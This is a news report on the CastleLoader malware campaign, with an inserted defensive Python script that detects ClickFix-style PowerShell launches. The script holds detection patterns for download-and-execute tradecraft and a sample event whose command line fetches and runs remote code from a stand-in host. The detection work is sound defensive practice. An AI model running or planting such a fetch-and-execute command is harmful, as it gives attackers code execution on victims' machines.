CastleLoader Malware Campaign Hits U.S. Government and Developers

A new and dangerous malware called CastleLoader is infecting users through fake websites and GitHub repositories.

In a rush? Here are the quick facts:

  • CastleLoader malware infected 469 devices, including U.S. government systems.
  • Malware spreads via fake ClickFix updates and GitHub repos.
  • GitHub deception tricks developers into downloading malicious files.

Since its discovery in early 2025, CastleLoader has infected at least 469 devices across the world, including U.S. government systems, as first reported by cybersecurity firm PRODAFT.

Researchers explain that CastleLoader functions as a malware distribution platform that delivers RedLine, StealC, DeerStealer, NetSupport RAT, and HijackLoader.

The malicious programs enable attackers to steal passwords, cookies, and crypto wallets, while providing them with remote access to victim devices.

Attackers use fake ClickFix phishing sites that mimic legitimate sources, such as Google Meet, browser updates, and document checks. Users who follow fake error correction instructions on the screen end up running malicious PowerShell commands, which initiate the infection sequence without their knowledge.
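One way a defender can surface the ClickFix pattern just described in endpoint telemetry. This is an added example, not code from the article or from PRODAFT; it assumes Sysmon-style process-creation fields (Image, ParentImage, CommandLine), and the indicator patterns and sample events are constructed for illustration rather than taken from the CastleLoader report.

```python
import re

# Heuristics for the ClickFix shape described above: the victim pastes a command
# into the Run dialog (so explorer.exe is the parent) and PowerShell fetches and
# runs something remote. Patterns are generic and constructed for this example,
# not CastleLoader indicators from PRODAFT's report.
INDICATORS = {
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b", re.I),
    "dynamic_execution": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "no_profile": re.compile(r"-no?p(rofile)?\b", re.I),
}
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
RUN_DIALOG_PARENT = re.compile(r"\\explorer\.exe$", re.I)


def score_event(event: dict) -> dict:
    """Score one process-creation event whose keys mirror Sysmon Event ID 1
    (Image, ParentImage, CommandLine); return matched indicators and a verdict."""
    hits = []
    if not POWERSHELL.search(event["Image"]):
        return {"hits": hits, "suspicious": False}
    if RUN_DIALOG_PARENT.search(event["ParentImage"]):
        hits.append("run_dialog_parent")
    hits += [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # Run-dialog launch plus a fetch-and-execute cradle is the ClickFix pattern;
    # three or more tradecraft flags from any parent also deserves a look.
    cradle = {"download_cradle", "dynamic_execution"} <= set(hits)
    suspicious = ("run_dialog_parent" in hits and cradle) or len(hits) >= 3
    return {"hits": hits, "suspicious": suspicious}

def triage(events):
    return [score_event(e) for e in events]

# Constructed sample telemetry, not real logs: one ClickFix-style launch, one
# routine admin script, one unrelated service process.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -w hidden -nop -c "iex (iwr http://example.invalid/v.txt)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -nop -File C:\ops\rotate-logs.ps1"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"svchost.exe -k netsvcs"},
]
```

Only the first event trips the verdict: the admin script shares the `-nop` flag but has neither the Run-dialog parent nor the fetch-and-execute cradle.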

“Castle Loader is a new and active threat, rapidly adopted by various malicious campaigns to deploy an array of other loaders and stealers,” PRODAFT said, as reported by The Hacker News.

“Its sophisticated anti-analysis techniques and multi-stage infection process highlight its effectiveness as a primary distribution mechanism in the current threat landscape,” the researchers added.

CastleLoader also spreads through fake GitHub repositories that appear to host trusted developer tools. Users who visit these deceptive pages end up installing malware because they trust the GitHub platform.

The researchers identify this malware as part of a broader Malware-as-a-Service (MaaS) operation. Its C2 control panel gives operators real-time capabilities to manage infected systems, execute attacks, and modify their campaigns.

“This technique exploits developers’ trust in GitHub and their tendency to run installation commands from repositories that appear reputable,” PRODAFT noted.

With an infection rate of nearly 29%, experts warn users to avoid unfamiliar update sites and to double-check all software sources.